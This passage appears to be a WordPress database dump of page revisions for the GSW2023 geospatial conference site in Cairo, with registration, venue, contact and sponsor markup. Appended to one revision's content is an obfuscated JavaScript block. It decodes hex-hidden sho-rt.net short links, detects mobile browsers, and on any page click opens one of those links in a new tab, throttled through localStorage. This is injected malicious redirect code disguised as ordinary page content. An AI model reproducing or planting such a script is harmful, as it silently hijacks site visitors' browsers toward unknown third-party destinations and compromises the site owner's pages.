img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" parallax_content=\"parallax_content_value\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1684295545972{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"BOOK YOU HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgsw2023-venue%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1684295835404{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE INFORMATION[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 03:58:06','2023-05-17 03:58:06','',3066,'https://gsw2023.com/?p=4503',0,'revision','',0),
(4504,1,'2023-05-17 04:08:13','2023-05-17 04:08:13','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" 